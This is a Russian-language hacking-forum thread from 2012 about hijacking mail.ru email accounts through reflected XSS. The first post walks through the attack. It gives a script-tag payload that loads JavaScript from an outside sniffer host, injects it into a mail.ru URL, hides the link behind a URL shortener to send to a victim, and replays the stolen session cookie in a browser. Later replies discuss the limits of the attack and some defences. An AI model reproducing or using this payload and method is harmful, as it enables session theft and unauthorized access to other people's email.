Взлом мыла с помощью пассивной xss

Discussion in 'Уязвимости Mail-сервисов' started by tickhack, 1 Feb 2012.

  1. tickhack

    tickhack New Member

    Joined:
    24 Jan 2012
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -10
    Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss.
    1.Нам понадобиться Пассивка
    2.Сниффер я буду использовать сниффер https://hacker-pro.net/sniffer/
    3.Мозги и руки !
    Так заходим на сниффер и берём Код для пассивной XSS атаки вот он
    Code:
    %3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"
    мы теперь должи прекрепить его к пассивной xss после знака "> и у нас получется вот так
    Code:
    http://mail.ru/###********=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"
    Если жертва перейдёт по этой ссылке то куки придут на наш сниффер.
    Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/
    заходим на этот сайт и где написано
    Code:
    Enter a long URL to make tiny:
    вбиваем туда нашу ядовитую ссылку и нажимаем на кнопочку
    Code:
    make a TinyURL
    И у нас появится ссылка http://tinyurl.com/823p5w9 ну увас может быть чучуть другая ну это не важно кидаем эту ссылку жертве и если она перейдёт по этой ссылке то её куки будут у нас.
    Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.
    Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают.
    ну чтож думаю всё !
    не забываем про "+"
    Автор : Tickhack
     
    #1 tickhack, 1 Feb 2012
    Last edited: 1 Feb 2012
  2. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    tickhack, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?

    После этого что делать?
     
    #2 M_script, 1 Feb 2012
    Last edited: 1 Feb 2012
  3. martmm

    martmm New Member

    Joined:
    29 Jan 2010
    Messages:
    82
    Likes Received:
    4
    Reputations:
    4
    M_script после этого ты попадаешь в мыло жертвы если куки еще действительны будут!)))
     
  4. tickhack

    tickhack New Member

    Joined:
    24 Jan 2012
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -10
    после этого заходишь на майл.ру и попадаешь на мыло жертвы
    только не забудь заменить куки жертвы на свои в опере :)
     
  5. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)
     
  6. tickhack

    tickhack New Member

    Joined:
    24 Jan 2012
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -10
    Не жалко у меня их много :D
     
  7. tickhack

    tickhack New Member

    Joined:
    24 Jan 2012
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -10
    уже нету пассивки :D
     
  8. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    :D :D :D

    Потроллить решил?
     
  9. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    martmm, tickhack, вы неправильно поняли вопрос.
    Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера?
     
    #9 M_script, 1 Feb 2012
    Last edited: 1 Feb 2012
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Ну если я не отстал от жизни, то думаю никак. Разве мегабаг найдут. Видел пару тем, в которых предлагают купить:
    Как это делают, хз.
     
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Стандартных возможностей для этого в почтовом сервисе разумеется нет. Так же, как нет стандартных возможностей внедрения JS-кода, кражи сессий и т.д.
     
    1 person likes this.
  12. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    В мейле это невозможно.
    Сейчас можно только: в одноклассниках, вконтакте.
    Раньше можно было в яндексе
     
    1 person likes this.
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Вот вот. Есть какие-то умлельцы. CSRF+Fake?!
     
    1 person likes this.
  14. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Откуда такая уверенность в безопасности мейла?
     
  15. winfle

    winfle New Member

    Joined:
    27 Jan 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Спасибо.Очень благодарен
     
  16. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    Ребята, а кким образом можно обезопасить себе на mail.ru, чтоб не стать жертвой XSS? фейк, СИ - не пройдет как бы 98% :) это я о себе, но боюсь, что с помощю XSS это сделают. Может есть какие то решения как можно больше обезопасить себя?
     
  17. thrust

    thrust Elder - Старейшина

    Joined:
    20 Jul 2011
    Messages:
    50
    Likes Received:
    41
    Reputations:
    31
    В настройках безопасности есть пункт сессия только с одного IP-адреса
     
  18. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    thrust, сессия с одного IP не поможет. Через XSS можно не только куки украсть, но и прочитать все письма непосредственно из твоего браузера.
    B1t.exe, не заходи на мыло через веб-интерфейс, используй почтовые клиенты.
     
  19. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    Он уже стоит у меня (или по умолчанию у всех стоит)


    без клиента никак? просто никак немогу привыкать клиенты. мне они не нравятся.
     
    #19 B1t.exe, 1 Feb 2012
    Last edited: 1 Feb 2012
  20. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Можно еще отключить JS в браузере. Но удобнее юзать клиент.

    В этой статье можно было описать хотя бы старый нерабочий способ или указать ссылки на темы продаж.
    "Как угнать куки через пассивку" != "Взлом мыла с помощью пассивной xss"
     
    #20 M_script, 2 Feb 2012
    Last edited: 2 Feb 2012
Loading...